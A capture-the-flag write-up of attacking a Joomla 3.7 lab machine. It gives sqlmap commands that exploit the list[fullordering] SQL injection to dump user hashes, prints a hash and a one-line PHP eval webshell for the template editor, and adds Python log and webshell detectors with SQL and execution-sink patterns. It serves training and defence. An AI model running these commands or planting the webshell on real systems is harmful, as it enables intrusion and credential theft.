First, a reminder: the Cybersecurity Law of the People's Republic of China (中华人民共和国网络安全法) applies.
Start
192.168.37.132
This time, there is only one flag, one entry point and no clues.
To get the flag, you'll obviously have to gain root privileges.
How you get to be root is up to you - and, obviously, the system.
Good luck - and I hope you enjoy this little challenge. :-)
Goal: root privileges.
Meanwhile, scan the web root for text files:
dirb http://192.168.37.132 -X .txt
Joomla version: 3.7
searchsploit joomla
/usr/share/exploitdb/exploits/php/webapps/42033.txt
Copy the exploit file to the desktop and open it there; opening it in place may be slow.
--passwords Enumerate DBMS users password hashes
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate
-C COL DBMS database table column(s) to enumerate
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
192.168.37.132
sqlmap -u "http://192.168.37.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
The joomladb database. Next, enumerate its tables:
sqlmap -u "http://192.168.37.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
Tables enumerated. Next, enumerate the columns of the #__users table:
sqlmap -u "http://192.168.37.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]
sqlmap -u "http://192.168.37.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]
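The sqlmap runs above all hit the same Joomla endpoint with a SQL function name smuggled into the list[fullordering] parameter. From the defender's side, that parameter is easy to audit in web-server access logs: a legitimate ordering value is a column name plus an optional ASC/DESC, nothing else. The script below is an added example, not part of the original write-up; it parses Apache/nginx "combined" log lines (the sample lines are constructed here) and flags requests whose list[fullordering] value contains a SQL function or does not look like a plain column/direction pair, plus a weak secondary signal on the sqlmap User-Agent.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Apache/nginx "combined" log format:
# ip - - [time] "METHOD path HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# What a legitimate Joomla ordering value looks like: "a.id ASC", "a.title DESC", "a.ordering".
ORDERING_OK = re.compile(r'^[A-Za-z0-9_.]+(?: (?:ASC|DESC))?$', re.IGNORECASE)

# SQL functions / keywords that never belong in an ordering parameter.
SQL_MARKERS = re.compile(
    r'\b(?:updatexml|extractvalue|union|select|sleep|benchmark)\b', re.IGNORECASE
)

# Constructed sample log lines (not from the original page): one benign request,
# one bare "updatexml" probe, one function-call payload with the default sqlmap UA,
# and one unrelated request to the admin login page.
SAMPLE_LOG = [
    '192.168.37.1 - - [10/Oct/2023:12:00:01 +0000] "GET /index.php?option=com_fields&view=fields'
    '&layout=modal&list%5Bfullordering%5D=a.id%20ASC HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '192.168.37.1 - - [10/Oct/2023:12:00:02 +0000] "GET /index.php?option=com_fields&view=fields'
    '&layout=modal&list%5Bfullordering%5D=updatexml HTTP/1.1" 500 412 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '192.168.37.1 - - [10/Oct/2023:12:00:03 +0000] "GET /index.php?option=com_fields&view=fields'
    '&layout=modal&list%5Bfullordering%5D=updatexml%281%2C1%2C1%29 HTTP/1.1" 500 412 "-" "sqlmap/1.7"',
    '192.168.37.1 - - [10/Oct/2023:12:00:04 +0000] "GET /administrator/ HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
]


def classify_request(path, agent):
    """Return a list of reason codes for one request; an empty list means it looks benign."""
    reasons = []
    # parse_qs percent-decodes keys and values once, so list%5Bfullordering%5D becomes list[fullordering]
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)
    for raw in params.get("list[fullordering]", []):
        value = unquote_plus(raw)  # second decode catches double-encoded payloads; harmless otherwise
        if not ORDERING_OK.match(value):
            reasons.append("unexpected_ordering_value")
        if SQL_MARKERS.search(value):
            reasons.append("sql_function_in_ordering")
    # Weak signal: the page's own commands use --random-agent, so do not rely on this alone.
    if "sqlmap" in agent.lower():
        reasons.append("sqlmap_user_agent")
    return reasons


def find_sqli_attempts(lines):
    """Parse combined-format log lines and return only the flagged requests."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        reasons = classify_request(m["path"], m["agent"])
        if reasons:
            hits.append({"ip": m["ip"], "time": m["time"], "status": m["status"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_sqli_attempts(SAMPLE_LOG):
        print(hit)
```

The second sample line is the important one: its User-Agent is a randomised browser string, exactly what --random-agent produces, so only the parameter check catches it. The 500 status on the probe lines is another useful correlation, since updatexml-style injection works by forcing a database error.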
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
192.168.37.132
After logging in to this page there is nothing useful; it only allows editing the page itself. So the admin account must be usable somewhere else. Next, scan for directories.
The scan found:
Sure enough, another login page.
Entered the backend.
The goal is clear: we want root, so first take control of the box. A one-line webshell can be written:
PHP:
<?php
@eval($_REQUEST['Pai']);
?>
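A one-liner like the one above is trivial to plant once an attacker has template-editing rights in the Joomla backend, and just as trivial to spot on disk: a request superglobal fed straight into an execution sink. The scanner below is an added example, not code from the original page; it flags that pattern line by line in PHP source, and separately flags any .php file sitting in Joomla directories that should only ever hold uploads or cache data (the directory list is an assumption for illustration, not a Joomla rule). It generalises beyond the page's eval/$_REQUEST case to the other common sinks and superglobals.

```python
import os
import re
import sys

# Execution sinks and request superglobals that together characterise one-line webshells.
SINKS = r'(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open)'
SUPERGLOBALS = r'\$_(?:REQUEST|GET|POST|COOKIE)'
WEBSHELL_RE = re.compile(rf'@?\b{SINKS}\s*\(\s*{SUPERGLOBALS}\s*\[', re.IGNORECASE)

# Assumed list of Joomla directories that hold uploads/cache and should contain no PHP code.
NO_CODE_DIRS = ("images", "tmp", "cache")


def scan_php_source(src):
    """Return (line number, reason) pairs for lines that pipe request data into a sink."""
    findings = []
    for lineno, line in enumerate(src.splitlines(), 1):
        if WEBSHELL_RE.search(line):
            findings.append((lineno, "superglobal passed to execution sink"))
    return findings


def flag_path(relpath):
    """True when a PHP file lives under a directory that should hold no executable code."""
    parts = relpath.replace("\\", "/").split("/")
    return relpath.lower().endswith(".php") and parts[0] in NO_CODE_DIRS


def scan_tree(root):
    """Walk a Joomla install and return (relative path, line number, reason) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if flag_path(rel):
                findings.append((rel, 0, "PHP file in upload/cache directory"))
            with open(full, encoding="utf-8", errors="replace") as fh:
                for lineno, reason in scan_php_source(fh.read()):
                    findings.append((rel, lineno, reason))
    return findings


if __name__ == "__main__":
    # Usage: python scan_webshells.py /path/to/joomla
    for rel, lineno, reason in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{rel}:{lineno}: {reason}")
```

Pair this with a file-integrity baseline of the Joomla install: a webshell written through the template editor changes the mtime and hash of a file that should only change during upgrades, which is a far more robust signal than any regex.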